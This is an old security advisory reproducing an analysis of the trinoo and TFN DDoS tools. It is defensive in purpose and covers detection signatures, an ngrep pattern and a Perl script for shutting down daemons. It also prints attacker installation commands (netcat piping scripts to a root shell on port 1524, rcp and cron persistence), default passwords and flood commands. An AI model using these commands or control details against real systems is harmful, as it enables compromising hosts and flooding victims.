Denial of Service Attack


    Read below (well, your network)


    A new form  of Denial of  Service (DoS) attack  has been developed
    that is more powerful than any previous DoS attack observed on the
    Internet.   A  Denial  of  Service  attack  is designed to bring a
    network down by flooding it  with large amounts of traffic.   This
    DoS  attack  uses  an  array  of  compromised  systems to launch a
    distributed flood  attack against  a single  target.   ISS X-Force
    considers this  attack as  a high  risk since  it can  potentially
    impact  a  wide  number  of  organizations.   It  has proven to be
    successful and is difficult to defend against.

    Over the  last two  months, several  high-capacity commercial  and
    educational  networks  have  been  affected  by  this  type of DoS
    attack.   Two  known  exploit  tools  are  currently being used to
    implement   this   attack: trin00  and Tribe  Flood Network (TFN).
    Attackers  can  install  these  tools  on  hundreds of compromised
    machines and direct a  network of trin00/TFN machines  to initiate
    an  attack   against  a   single  victim.    This  attack   occurs
    simultaneously from these machines, making it more dangerous  than
    any DoS attack launched from any single machine.

    The  trin00  distributed  denial-of-service  system  consists of 3

     The Client:
     The client  is not  part of  the trin00  package.   The telnet or
     Netcat program is used to connect to port 27665 of the  "master."
     An  attacker  connects  to  a  master to control the "broadcasts"
     that  will  flood  a  target.   (The  master  and  broadcast  are
     described later in this section.)

     The Master:
     The  master  is  contained  in  the  file  master.c in the trin00
     package.  While running, it  waits for UDP packets going  to port
     31335.   These   packets  are  registration   packets  from   the
     "broadcast." It  also waits  for connections  to TCP  port 27665.
     When a  client connects  to port  27665, the  master expects  the
     password to  be sent  before it  returns any  data.   The default
     password  is  "betaalmostdone".   When  the  master  is  run,  it
     displays a "??" prompt, waiting for a password.  The password  is

     The Broadcast (or Bcast):
     The broadcast  is the  code in  trin00 that  performs the  actual
     flooding. It is ns.c in  the trin00 package.  When  the broadcast
     is compiled, the IP addresses of the masters that can control  it
     are hardcoded into  the program.   Starting the broadcast,  a UDP
     packet is sent  to port 31335  of each master  IP, containing the
     data "*HELLO*".   This packet  registers the  broadcast with  the
     master.  An attacker can then  connect to the master and use  the
     daemons to send a UDP flood.

    The DoS attack that trin00 broadcasts use is a UDP flood.   Trin00
    sends a large number of  UDP packets containing 4 data  bytes (all
    zeros) and coming from one source port to random destination ports
    on the target host.  The target host returns ICMP Port Unreachable
    messages.   The  target  host  slows  down  because  it  is   busy
    processing the UDP packets, and at this point there will be little
    or no network bandwidth left.

    Dave Dittrich posted analysing  of trin00 and Tribe  Flood Network

    The following is an analysis of the DoS Project's "trinoo" (a.k.a.
    "trin00")  master/slave  programs,  which  implement a distributed
    network denial of  service tool.   Trinoo daemons were  originally
    found in  binary form  on a  number of  Solaris 2.x systems, which
    were  identified  as  having  been  compromised by exploitation of
    buffer  overrun  bugs  in  the  RPC  services  "statd", "cmsd" and
    "ttdbserverd".  These attacks are described in CERT Incident  Note

    The  trinoo  daemons  were  originally  believed  to be UDP based,
    access-restricted  remote   command  shells,   possibly  used   in
    conjunction  with  sniffers  to  automate recovering sniffer logs.
    During investigation  of these  intrusions, the  installation of a
    trinoo network was  caught in the  act and the  trinoo source code
    was obtained from the account  used to cache the intruders'  tools
    and log files.  This analysis was done using this recovered source
    code.   Modification of  the source  code would  change any of the
    details in  this analysis,  such as  prompts, passwords, commands,
    TCP/UDP port numbers, or supported attack methods, signatures, and
    features.  The  daemon was compiled  and run on  Solaris 2.5.1 and
    Red Hat Linux 6.0 systems.  The master was compiled and run on Red
    Hat Linux 6.0.   It is believed that  both master and daemon  have
    been witnessed  "in the  wild" on  these same  platforms.   Trinoo
    networks are probably being set up on hundreds, perhaps thousands,
    of systems on  the Internet that  are being compromised  by remote
    buffer overrun exploitation.  Access to these systems is  probably
    being perpetuated  by the  installation of  multiple "back  doors"
    along with the trinoo daemons.   A trinoo network of at least  227
    systems -- 114 of these at  Internet2 sites -- was used on  August
    17, 1999 to flood a single system at the University of Minnessota,
    swamping the target network and rendering it unusable for over two
    days.   While responding  to this  attack, large  flows were  also
    noticed going to at least sixteen other systems, some outside  the

    A typical installation might go something like this.

    1).  A stolen account is  set up as a repository for  pre-compiled
         versions  of  scanning  tools,  attack  (i.e.  buffer overrun
         exploit) tools,  root kits  and sniffers,  trinoo daemon  and
         master  programs,  lists  of  vulnerable hosts and previously
         compromised  hosts,  etc.   This  would  normally  be a large
         system  with  many  users,  one  with  little  administrative
         oversight, and on a high-bandwidth connection for rapid  file

    2).  A scan  is performed  of large  ranges of  network blocks  to
         identify potential  targets.   Targets would  include systems
         running various services  known to have  remotely exploitable
         buffer overflow security bugs, such as wu-ftpd, RPC  services
         for "cmsd",  "statd", "ttdbserverd",  "amd", etc.   Operating
         systems being targeted appear to be primarily Sun Solaris 2.x
         and Linux (due to the ready availability of network  sniffers
         and "root kits" for concealing back doors, etc.), but  stolen
         accounts on any  architecture can be  used for caching  tools
         and log files.

    3).  A list of vulnerable systems is then used to create a  script
         that performs the  exploit, sets up  a command shell  running
         under the root account that  listens on a TCP port  (commonly
         1524/tcp,  the  "ingreslock"  service  port), and connects to
         this port  to confirm  the success  of the  exploit.  In some
         cases, an electronic mail message is sent to an account at  a
         free web based  email service to  confirm which systems  have
         been compromised.   The result is  a list of  "owned" systems
         ready  for  setting  up  back  doors, sniffers, or the trinoo
         daemons or masters.

     4). From  this  list  of  compromised  systems, subsets with  the
         desired  architecture  are  chosen  for  the  trinoo network.
         Pre-compiled binaries  of the  trinoo daemon  are created and
         stored on a stolen account somewhere on the Internet.

     5). A  script  is  then  run  which  takes  this list of  "owned"
         systems  and  produces  yet  another  script  to automate the
         installation  process,  running  each  installation  in   the
         background  for  maximum  multitasking.   This  script   uses
         "netcat" ("nc")  to pipe  a shell  script to  the root  shell
         listening on, in this case, port 1524/tcp:

        ./ | nc 1524 &
        ./ | nc 1524 &
        ./ | nc 1524 &
        ./ | nc 1524 &
        ./ | nc 128.bbb.2.80 1524 &
        ./ | nc 128.bbb.2.81 1524 &
        ./ | nc 128.bbb.2.238 1524 &
        ./ | nc 128.ccc.12.22 1524 &
        ./ | nc 128.ccc.12.50 1524 &
         . . .

         The script "",  whose output is  being piped to  these
         systems looks like:

        echo "rcp /usr/sbin/rpc.listen"
        echo "echo rcp is done moving binary"

        echo "chmod +x /usr/sbin/rpc.listen"

        echo "echo launching trinoo"
        echo "/usr/sbin/rpc.listen"

        echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
        echo "crontab cron"
        echo "echo launched"
        echo "exit"

         Depending on how closely  crontab files are monitored,  or if
         they are used at all, this  may be detected easily.  If  cron
         is not used at all by this user (usually root), it may not be
         detected at all.   Another method was  witnessed on at  least
         one other system, where the daemon was named "xterm", and was
         started using a script (named  "c" on the system on  which it
         was found) that contains:

        cd /var/adm/.1
        export PATH
        xterm 1>/dev/null 2>&1

         This would supposedly imply  a method of running  this script
         on demand  to set  up the  trinoo network.   Even more subtle
         ways  of  having  trinoo  daemons/masters  lie  in  wait  for
         execution at a given time are easy to envision (e.g., UDP  or
         ICMP based client/server shells, such as LOKI, programs  that
         wake up periodically  and open a  listening TCP or  UDP port,
         etc.)   The  result  of  this  automation  is the ability for
         attackers to set up the denial of service network, on  widely
         dispersed systems whose true  owners don't even know  are out
         of their control, in a very short time frame.

    6).  Optionally, a "root kit"  is installed on the system to  hide
         the  presence  of  programs,  files, and network connections.
         This  is  more  important  on  the master system, since these
         systems are key  to the trinoo  network. (It should  be noted
         that in  many cases,  masters have  been set  up on  Internet
         Service  Providers'  primary  name  server hosts, which would
         normally have extremely high packet traffic and large numbers
         of TCP and UDP connections, which would effectively hide  any
         trinoo related traffic or  activity, and would likely  not be
         detected.   (The  fact  that  these  are primary name servers
         would also tend  to make the  owners less likely  to take the
         system off the Internet when  reports begin to come in  about
         suspected denial  of service  related activity.)   Root  kits
         would also be  used on systems  running sniffers that,  along
         with  programs  like  "hunt"  (TCP/IP session hijacking tool)
         are  used  to  burrow  further  into other networks directly,
         rather than through remote buffer overrun exploits (e.g.,  to
         find sites to set up new file repositories, etc.)

    For more on "root kits" and some ways to get around them, see:

    The network: attacker(s)-->master(s)-->daemon(s)-->victim(s)
    The trinoo network is made up of a master server ("master.c")  and
    the trinoo  daemon ("ns.c").   A trinoo  network would  look  like

                      +----------+           +----------+
                      | attacker |           | attacker |
                      +----------+           +----------+
                           |                      |
            . . . --+------+---------------+------+----------------+-- . . .
                    |                      |                       |
                    |                      |                       |
               +----------+           +----------+            +----------+
               |  master  |           |  master  |            |  master  |
               +----------+           +----------+            +----------+
                    |                      |                       |
                    |                      |                       |
    . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
             |            |            |            |            |
             |            |            |            |            |
         +--------+   +--------+   +--------+   +--------+   +--------+
         | daemon |   | daemon |   | daemon |   | daemon |   | daemon |
         +--------+   +--------+   +--------+   +--------+   +--------+

    The  attacker(s)  control  one  or  more "master" servers, each of
    which can control  many "daemons" (known  in the code  as "Bcast",
    or  "broadcast"  hosts.)   The  daemons  are  all  instructed   to
    coordinate  a  packet  based  attack  against  one  or more victim
    systems.  All that  is then needed is  the ability to establish  a
    TCP connection to the master hosts using "telnet" and the password
    to the  master server  to be  able to  wage massive,  coordinated,
    denial of service attacks.

    Communication ports

        Attacker to Master(s):  27665/tcp
        Master to daemon(s):    27444/udp
        Daemon to Master(s):    31335/udp

    Remote control  of the  trinoo master  is accomplished  via a  TCP
    connection to  port 27665/tcp.   After connecting,  the user  must
    give  the   proper  password   ("betaalmostdone").    If   another
    connection  is  made  to  the  server  while  someone  is  already
    authenticated, a warning  is sent to  them with the  IP address of
    the  connecting  host  (it  appears  there  is  a bug that reports
    incorrect  IP  addresses,  but  a  warning is still communicated).
    This will  no doubt  be fixed  eventually and  will then  give the
    attackers time to clean up and cover their tracks.   Communication
    from  the  trinoo  master  to  daemons  is via UDP packets on port
    27444/udp.  Command lines are space separated lines of the form:

        arg1 password arg2

    The default password for  commands is "l44adsl", and  only command
    lines   that   contain   the   substring   "l44"   are  processed.
    Communication from the  trinoo daemons and  the master is  via UDP
    packets on port 31335/udp.   When the daemon starts, it  initially
    sends "*HELLO*" to  the master, which  maintains a list  of active
    daemons that it controls (packet captured using "sniffit"):

        UDP Packet ID (from_IP.port-to_IP.port):
         45 E 00 . 00 . 23 # B1 . 5D ] 40 @ 00 . F8 . 11 . B9 . 27 . C0 . A8 . 00 . 01 .
         0A . 00 . 00 . 01 . 80 . 6C l 7A z 67 g 00 . 0F . 06 . D4 . 2A * 48 H 45 E 4C L
         4C L 4F O 2A *

    If the trinoo  master sends a  "png" command to  a daemon on  port
    27444/udp, the daemon will reply to the server that just sent  the
    "png" command by sending the string "PONG" on port 31335/udp:

        UDP Packet ID (from_IP.port-to_IP.port):
         45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 .
         C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20
         6C l 34 4 34 4 61 a 64 d 73 s 6C l

        UDP Packet ID (from_IP.port-to_IP.port):
         45 E 00 . 00 . 20   13 . 81 . 40 @ 00 . F8 . 11 . 57 W 07 . C0 . A8 . 00 . 01 .
         0A . 00 . 00 . 01 . 80 . 6F o 7A z 67 g 00 . 0C . 4E N 24 $ 50 P 4F O 4E N 47 G

    Password protection
    Both  the  master  and  daemons  are password protected to prevent
    system administrators (or other hacker groups) from being able  to
    take control of the trinoo  network.  These passwords are  crypt()
    style passwords.  They are used in a symmetric fashion, where  the
    encrypted password  is compiled  into the  master and  daemons and
    used to  compare against  the clear-text  version of  the password
    that  is  sent  over  the  network  (the  current version does not
    encrypt  the  actual  session,  so  the  clear-text  passwords are
    exposed in transit and the master control sessions are subject  to
    TCP session highjacking).   When initially run, the  master daemon
    produces a prompt, waiting for a password.  If the proper password
    is not  received, the  program exits.   If the  proper password is
    given,  the  process  announces  its  execution, forks to continue
    running in the background, and exits:

        # ./master
        ?? wrongpassword
         . . .

        # ./master
        ?? gOrave
        trinoo v1.07d2+f3+c [Sep 26 1999:10:09:24]

    Likewise, when  you connect  to the  remote command  port (default
    27665/tcp), you must also give a password:

        attacker$ telnet 27665
        Connected to
        Escape character is '^]'.
        Connection closed by foreign host.
         . . .

        attacker$ telnet 27665
        Connected to
        Escape character is '^]'.
        trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]


    Certain commands sent to the trinoo daemons by the master are also
    password protected.  This password  is sent in clear text  between
    the master and daemons.  The default passwords were:

        "l44adsl"        trinoo daemon password
        "gOrave"         trinoo master server startup ("?? " prompt)
        "betaalmostdone" trinoo master remote interface password
        "killme"         trinoo master password to control "mdie" command

    Master commands
    The trinoo master supports the following commands:

        die       Shut down the master.

       quit       Log off the master.

   mtimer N       Set DoS timer to N seconds.  N can be between 1  and
                  1999 seconds. If N is < 1, it defaults to 300. If N
                  is > 2000, it defaults to 500.

     dos IP       DoS the  IP address   specified.   A command   ("aaa
                  l44adsl  IP")  is  sent  to  each  Bcast host (i.e.,
                  trinoo daemons)  telling them  to DoS  the specified
                  IP address.

  mdie pass       Disable all Bcast hosts, if the correct password  is
                  specified. A command is sent ("d1e l44adsl") to each
                  Bcast host telling  them to shut  down.  A  separate
                  password is required for this command.

      mping       Send a PING command ("png l44adsl") to every  active
                  Bcast host.

       mdos <ip1:ip2:ip3>
                  Multiple DoS.   Sends a  multiple DoS  command ("xyz
                  l44adsl 123:ip1:ip2:ip3") to each Bcast host.

       info       Print version and compile information,

      msize       Set the buffer size for packets sent during DoS attacks.

nslookup host     Do a name service lookup of the specified host  from
                  the  perspective  of  the  host  on which the master
                  server is running.

     killdead     Attempts to  weed out all dead Bcast hosts by  first
                  sending  all  known  Bcast  hosts  a  command  ("shi
                  l44adsl") that  causes any  active daemons  to reply
                  with the initial "*HELLO*" string, then renames  the
                  Bcast  file  (with  extension  "-b")  so  it will be
                  re-initialized  when  the   "*HELLO*"  packets   are

    usebackup     Switch to   the backup  Bcast file  created by   the
                  "killdead" command.

        bcast     List all active Bcast hosts.

   help [cmd]     Give a   (partial) list  of commands,  or a    brief
                  description of the command "cmd" if specified.

        mstop     Attempts to stop a DoS attack (not implemented,  but
                  listed in the help command).

    Daemon commands
    The trinoo daemon supports the following commands:

    aaa pass IP  DoS the  specified IP address.  Sends UDP  packets to
                 random  (0-65534)  UDP  ports  on  the  specified  IP
                 addresses  for  a  period  of  time  (default  is 120
                 seconds, or  1 -  1999 seconds  as set  by the  "bbb"
                 command.) The size of the packets is that set by  the
                 "rsz" command, or the default size of 1000 bytes.

     bbb pass N  Sets time limit (in seconds) for DoS attacks.

       shi pass  Sends the  string "*HELLO*"  to the  list of   master
                 servers compiled into the program on port 31335/udp.

       png pass  Sends the string "PONG" to the master that issued the
                 the command on port 31335/udp.

       d1e pass  Shut down the trinoo daemon.

          rsz N  Set size of buffer for DoS attacks to N bytes.   (The
                 trinoo  daemon  simply  malloc()s  a buffer with this
                 size, then  sends the  uninitialized contents  of the
                 buffer during an attack.)

        xyz pass 123:ip1:ip2:ip3
                 Multiple  DoS.   Does  the  same  thing  as the "aaa"
                 command, but for multiple IP addresses.

    It could  be coincidence,  but let's  give the  author some credit
    and assume that  three letter commands  were chosen so  they don't
    show  up  in  the  binary  as  visible  strings  under the default
    behavior of STRINGS(1).   You must use  the "--bytes=3" option  of
    GNU STRINGS(1) to see the commands:

        # strings --bytes=3 ns | tail -15
        %s %s %s

    The  method  used  to  install  the  trinoo daemon on some systems
    employs  a  crontab  entry  to  start  the  daemon  every  minute.
    Examining crontab files would locate this entry:

        * * * * * /usr/sbin/rpc.listen

    The master program creates a file (default name "...")  containing
    the set of  Bcast hosts.   If the command  "killdead" is used,  an
    "shi"  command  is  sent  to  all  daemons  listed in "...", which
    causes them to send the  initial "*HELLO*" string to all  masters.
    The current list  is renamed (default  "...-b") and a  new list is
    then generated as each remaining live daemon sends its  "*HELLO*".
    The source code ("master.c") contains the following lines:

        . . .
        /* crypt key encrypted with the key 'bored'(so hex edit cannot get key easily?)
           comment out for no encryption... */
        #define CRYPTKEY "ZsoTN.cq4X31"
        . . .

    If  the  program  was  compiled  with  CRYPTKEY  defined,  the  IP
    addresses  of  Bcast  hosts  are  encrypted  using  the   Blowfish
    encryption algorithm:

        # ls -l ... ...-b
        -rw-------   1 root     root           25 Sep 26 14:46 ...
        -rw-------   1 root     root           50 Sep 26 14:30 ...-b
        # cat ...
        # cat ...-b

    Assuming there  is no  "root kit"  present to  hide processes, the
    master server shows the following network socket fingerprints  (of
    course, the names  and directory locations  of either program  are
    subject to change):

        # netstat -a --inet
        Active Internet connections (servers and established)
        Proto Recv-Q Send-Q Local Address           Foreign Address         State
        tcp        0      0 *:27665                 *:*                     LISTEN
        . . .
        udp        0      0 *:31335                 *:*
        . . .

        # lsof | egrep ":31335|:27665"
        master   1292     root    3u  inet       2460              UDP *:31335
        master   1292     root    4u  inet       2461              TCP *:27665 (LISTEN)

        # lsof -p 1292
        master  1292 root  cwd    DIR    3,1    1024 14356 /tmp/...
        master  1292 root  rtd    DIR    3,1    1024     2 /
        master  1292 root  txt    REG    3,1   30492 14357 /tmp/.../master
        master  1292 root  mem    REG    3,1  342206 28976 /lib/
        master  1292 root  mem    REG    3,1   63878 29116 /lib/
        master  1292 root  mem    REG    3,1 4016683 29115 /lib/
        master  1292 root    0u   CHR    4,1          2967 /dev/tty1
        master  1292 root    1u   CHR    4,1          2967 /dev/tty1
        master  1292 root    2u   CHR    4,1          2967 /dev/tty1
        master  1292 root    3u  inet   2534           UDP *:31335
        master  1292 root    4u  inet   2535           TCP *:27665 (LISTEN)

    A system running a daemon would show the following:

        # netstat -a --inet
        Active Internet connections (servers and established)
        Proto Recv-Q Send-Q Local Address           Foreign Address         State
        . . .
        udp        0      0 *:1024                  *:*
        udp        0      0 *:27444                 *:*
        . . .

        # lsof | egrep ":27444"
        ns       1316     root    3u  inet       2502              UDP *:27444

        # lsof -p 1316
        ns      1316 root  cwd    DIR    3,1    1024 153694 /tmp/...
        ns      1316 root  rtd    DIR    3,1    1024      2 /
        ns      1316 root  txt    REG    3,1    6156 153711 /tmp/.../ns
        ns      1316 root  mem    REG    3,1  342206  28976 /lib/
        ns      1316 root  mem    REG    3,1   63878  29116 /lib/
        ns      1316 root  mem    REG    3,1 4016683  29115 /lib/
        ns      1316 root    0u   CHR    4,1           2967 /dev/tty1
        ns      1316 root    1u   CHR    4,1           2967 /dev/tty1
        ns      1316 root    2u   CHR    4,1           2967 /dev/tty1
        ns      1316 root    3u  inet   2502            UDP *:27444
        ns      1316 root    4u  inet   2503            UDP *:1024

    The first weakness  is that the  crypt() encrypted passwords,  and
    some prompts and  return strings, are  visible in both  the master
    and daemon binary images.  This can allow you to identify  whether
    you  have  found  a  master  or  a  daemon,  determine whether the
    passwords  are  the  defaults  shown  in  this  paper  or not, and
    potentially allow you to  exploit the password weaknesses  to take
    control of some/all of the trinoo network yourself.  If the source
    code  has  been  modified  (which  it  no  doubt  will  by smarter
    attackers),  you  would  need  to  crack  the  passwords, or use a
    hexadecimal/ASCII  editor  (e.g.,  "xxd",  part  of the VIM editor
    suite)  and  change  them  in  the  binary image, in order to, for
    example, run the master to retrieve  the list of daemons.  If  the
    source  has  not,  you  can  determine  this fact by observing the
    strings embedded in the program binary:

        # strings - ns
         . . .
        %s %s %s
        aIf3YWfOhw.V.		<=== crypt() encrypted password "l44adsl"
         . . .

        # strings - master
         . . .
        trinoo %s
        l44adsl			<=== clear text version of daemon password
        0nm1VNMXqRMyM		<=== crypt() encrypted password "gOrave"
        Sep 26 1999
        trinoo %s [%s:%s]
        ZsoTN.cq4X31		<=== CRYPTKEY
        NEW Bcast - %s
        PONG %d Received from %s
        Warning: Connection from %s
        beUBZbLtK7kkY		<=== crypt() encrypted password "betaalmostdone"
        trinoo %s..[rpm8d/cb4Sx/]
         . . .
        DoS: usage: dos <ip>
        DoS: Packeting %s.
        aaa %s %s
        ErDVt6azHrePE		<=== crypt() encrypted password for "mdie" command
        mdie: Disabling Bcasts.
        d1e %s
        mdie: password?
         . . .

    Next, and more vulnerable,  is the daemon password,  which travels
    the network in clear  text form.  Assuming  you know the UDP  port
    on which the  master communicates to  the client, you  can capture
    the password using "sniffit",  "ngrep", "tcpdump", or any  network
    monitoring program  capable of  showing UDP  packet data payloads.
    For example, here  is the "png"  command being sent  to the trinoo
    daemon as seen by "sniffit":

        UDP Packet ID (from_IP.port-to_IP.port):
         45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 .
         C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20
         6C l 34 4 34 4 61 a 64 d 73 s 6C l

    As was mentioned earlier, the "mdie" command in the trinoo  master
    is password protected  in the master  itself.  There  are a couple
    ways to attack this.   If you can determine the  crypt() encrypted
    string using the Unix  "strings" command, you could  (potentially)
    use a password cracking utility,  such as "crack",  and  break it.
    This may take a LONG time if the password was well chosen, but  it
    is feasible (and the "killme" password for the "mdie" command  was
    cracked in less than 30 seconds  on a Pentium II).  You  could try
    to sniff  the password  on the  wire between  the attacker and the
    master,  but  presumably  this  command  would  not be used by the
    attackers often,  if at  all, since  they want  the daemons  to be
    active  when  needed  for  an  attack.   You  may  have  more luck
    sniffing  the  daemon  password,  since  it  is  required for most
    commands.   This can  be done  on either  the daemon's or master's
    network  (these  are  usually  entirely  different  networks).  It
    should  be  easier  to  accomplish  on  the daemon's network since
    there  are  far  more  daemons  than  masters.   Since many of the
    masters have been found on primary name servers, presumably  there
    would  be  more  traffic  on  high-numbered  UDP ports on networks
    containing masters  than on  networks containing  daemons (outside
    of  the  duration  of  denial   of  service  attacks,  that   is).
    Furthermore you will likely find several daemons at a given  site,
    possibly as a result of detecting the original system compromise.

    Once you have located a daemon, you have also found the list of IP
    addresses of  masters (use  "strings" to  see them.)   You  should
    immediately  contact  these  sites  and  convince  them to closely
    inspect the system for signs of intrusion, with likely "root  kit"
    installations to  make this  task more  difficult, and  attempt to
    coordinate a response.  Having found a master, the list of daemons
    (which  will  likely  include  hosts  at  many other sites) can be
    obtained by simply identifying  the file which contains  the list,
    if unencrypted.   If, however,  the file  is encrypted,  you would
    either have to decrypt the Blowfish encrypted file using the  same
    key compiled into the program, or by taking control of the  master
    and using the "bcast" command.   It you have identified an  active
    command session to  a master, which  is a standard  "telnet" style
    TCP session, you could hijack  the session using "hunt" and  start
    executing commands.  Not knowing the "mdie" command password,  you
    could not disable all the daemons directly, but you COULD use  the
    "bcast" command and get a list of all of them (you would  probably
    want  to  do  this  using  the  "script"  command  to  generate  a
    transcript of the session, as this could be a very large list).

    Once you  know the  addresses of  all the  daemons, and the daemon
    password (visible in  "strings" output), you  could then send  the
    proper  command  string  in  UDP  packets  to any suspected trinoo
    daemon(s).   Creation  and  transmission  of  UDP  packets  can be
    accomplished with  tools like  LibNet, Spak,  the Perl  Net::RawIP
    library, etc.  (A Perl script using Net::RawIP named "trinot"  has
    been  developed  to  accomplish   this  task).   As  the   typical
    installation of the daemon includes  a crontab entry that runs  it
    every  minute,  you  would  have  to  constantly spray your entire
    network to keep  the daemons from  re-starting.  (This  may be due
    to programming bugs that cause the daemons to crash  occasionally,
    or may be  to defeat system  administrators who simply  notice and
    kill the process, but  do not think to  check for a crontab  entry
    that re-starts  the daemon).   The daemons  can also  be found  on
    your network by sniffing the  data portion of UDP packets  for the
    strings  "*HELLO*"  and  "PONG",  or  any  of  the command strings
    themselves  for  that  matter  (until  the  source  is modified to
    change  these  strings,  of  course.)  The  "ngrep"  program works
    nicely for this:

        # ngrep -i -x "*hello*|pong" udp
        interface: eth0 (
        filter: ip and ( udp )
        match: *hello*|pong
         . . .
        U ->
          2a 48 45 4c 4c 4f 2a                                  *HELLO*
        U ->
          50 4f 4e 47                                           PONG
        U ->
          50 4f 4e 47                                           PONG
        U ->
          50 4f 4e 47                                           PONG
         . . .

    While not weaknesses in  trinoo itself, there are  also weaknesses
    in the way the trinoo networks are set up.  As mentioned  earlier,
    some  systems  showed  crontab  entries  used to start the daemons
    once per minute.   This leaves an  obvious fingerprint on  crontab
    files.   The  scripts  observed  to  automate  the installation of
    trinoo networks  use the  Berkeley "rcp"  command (use  of rcp has
    also been observed  in a file  upload capability built  into newer
    versions of the "Tribe Flood Network" daemon program).  Monitoring
    "rcp" connections (514/tcp) from multiple systems on your network,
    in quick succession, to a  single IP address outside your  network
    would be a good trigger. (Note  that the use of "rcp" in  a script
    requires an anonymous trust  relationship, usually in the  form of
    "+ +" in  a user's ~/.rhosts  file, which also  will allow you  to
    immediately archive the contents of this account while  contacting
    the owners to preserve evidence).

    While trinoo only implements UDP flood attacks, TFN supports  ICMP
    flood,  UDP  flood,  SYN  flood,  and  Smurf style attacks, and is
    controlled  via  commands  sent  as  ICMP_ECHOREPLY  (ICMP Type 0)
    packets.  It also employs Blowfish encryption, similar to  trinoo.
    (TFN is analyzed below).

    trinot script:

    #!/usr/bin/perl -w
    # trinot v. 1.1
    # By Dave Dittrich <>
    # Send commands to trinoo daemon(s), causing them to PONG, *HELLO*
    # to all their masters, exit, etc.  Using this program (and knowledge
    # of the proper daemon password), you can affect trinoo daemons
    # externally and monitor packets to verify if the daemons are up,
    # expose their masters, or shut them down.
    # Needs Net::RawIP (
    # Requires libpcap (
    # Example: ./trinot host1 [host2 [...]]
    #          ./trinot -S host
    #          ./trinot -p password -P host
    # (This code was hacked from the "macof" program, written by
    # Ian Vitek <>)

    require '';
    use Net::RawIP;

    $a = new Net::RawIP({udp => {}});
    chop($hostname = `hostname`);

    die "usage: $0 [options] host1 [host2 [...]]\
    \t-P\t\t\tSend \"png\" command\
    \t-S\t\t\tSend \"shi\" command\
    \t-D\t\t\tSend \"d1e\" command (default)\
    \t-p password\t\t(default:\"l44adsl\")
    \t-f from_host\t\t(default:$hostname)\
    \t-s src_port\t\t(default:random)\
    \t-d dest_port\t\t(default:27444)\
    \t-l ipfile\t\tSend to IP addresses in ipfile\
    \t-i interface \t\tSet sending interface (default:eth0)\
    \t-h This help\n" unless ( !$opt_h );

    # set default values
    $opt_i = ($opt_i) ? $opt_i : "eth0";
    $s_port = ($opt_s) ? $opt_s : int rand 65535;
    $d_port = ($opt_d) ? $opt_d : 27444;
    $pass = ($opt_p) ? $opt_p : "l44adsl";

    # choose network card
    if($opt_e) {
      $a->ethnew($opt_i, dest => $opt_e);
    } else {

    $cmd = ($opt_P) ? "png $pass" :
           ($opt_S) ? "shi $pass" :
           ($opt_D) ? "d1e $pass" :
           "d1e $pass";
    $s_host = ($opt_f) ? $opt_f : $hostname;

    if ($opt_l) {
      open(I,"<$opt_l") || die "could not open file: '$opt_l'";
      while (<I>) {

    foreach $d_host (@ARGV) {
      $a->set({ip => {saddr => $s_host, daddr => $d_host},
               udp => {source => $s_port, dest => $d_port, data => $cmd}
      print "sending '$cmd' to $d_host\n" if $opt_v;


    RAZOR has acquired a copy of the Trojan Trinoo.  Here is a bit  of
    information about it.  The trojan is called service.exe, but could
    be renamed.  It is 23145 bytes  in length.  To remove it you  must
    kill in in memory, remove its entry at


    and delete the file from the hard drive.  Make sure you delete the
    correct file, and not services.exe.  It listens on udp port 34555,
    and will  respond to  pings on  udp port  35555.   The password is
    "[]..Ks"  (without  the  quotes).   Therefore  the  following will
    detect it.

    Set up a netcat listener:

        nc -u -n -l -p 35555 -v -w 100

    Send a trinoo ping:

        echo 'png []..Ks l44' | nc -u -n -v -w 3 34555

    The listener will display PONG if a trinoo daemon is listening.

    This will kill it:

        echo 'd1e []..Ks l44' | nc -u -n -v -w 3 34555

    After  it  is  killed,  the  udp  port  may still be bound until a
    reboot, at least on Windows  95/98.  Subsequent trinoo pings  will
    return an ICMP destination  unreachable/port unreachable if it  is
    down.   Both  Seth  McGann  and  Todd  Sabin  of RAZOR contributed
    heavily to the info above after disassembling the trojan.

    The following  is an  analysis of  the "Tribe  Flood Network",  or
    "TFN", by Mixter.  TFN is currently being developed and tested  on
    a large number of compromised Unix systems on the Internet,  along
    with another  distributed denial  of service  tool named  "trinoo"
    (discussed before).  TFN is made up of client and daemon programs,
    which  implement  a  distributed  network  denial  of service tool
    capable of  waging ICMP  flood, SYN  flood, UDP  flood, and  Smurf
    style attacks,  as well  as providing  an "on  demand" root  shell
    bound to a TCP port.  TFN daemons were originally found in  binary
    form on a number of Solaris 2.x systems, which were identified  as
    having been compromised by exploitation of buffer overrun bugs  in
    the RPC services "statd", "cmsd" and "ttdbserverd".  These attacks
    are described in CERT Incident Note 99-04:

    These daemons were originally believed  to be some form of  remote
    sniffer or access-controlled remote command shells, possibly  used
    in conjunction with sniffers to automate recovering sniffer  logs.
    During investigation of a related set of intrusions and denial  of
    service attacks using trinoo networks (another distributed  denial
    of  service  attack   tool  described  in   another  paper),   the
    installation of  a trinoo  network was  caught in  the act and the
    trinoo and TFN  source code was  obtained from the  stolen account
    used to cache the intruders'  tools and log files.   This analysis
    was  done  using  this  captured  source  code ("version 1.3 build
    0053", according to the  Makefile) and from observations  of newer
    compiled binaries of the TFN  daemon.  Modification of the  source
    code can  and would  change any  of the  details of this analysis,
    such as  prompts, passwords,  commands, TCP/UDP  port numbers,  or
    supported  attack  methods,  signatures,  and  features.  Both the
    daemon  and  client  were  compiled  and  run on Red Hat Linux 6.0
    systems.  It  is believed that  daemon has been  witnessed "in the
    wild" only on Solaris 2.x systems.  For an analysis of the initial
    intrusion and network setup phases, see the analysis of the trinoo
    network above.

    The network: attacker(s)-->client(s)-->daemon(s)-->victim(s)
    The TFN network is made  up of a tribe client  program ("tribe.c")
    and the  tribe daemon  ("td.c").   A TFN  network would  look like

                      +----------+           +----------+
                      | attacker |           | attacker |
                      +----------+           +----------+
                           |                      |
            . . . --+------+---------------+------+----------------+-- . . .
                    |                      |                       |
                    |                      |                       |
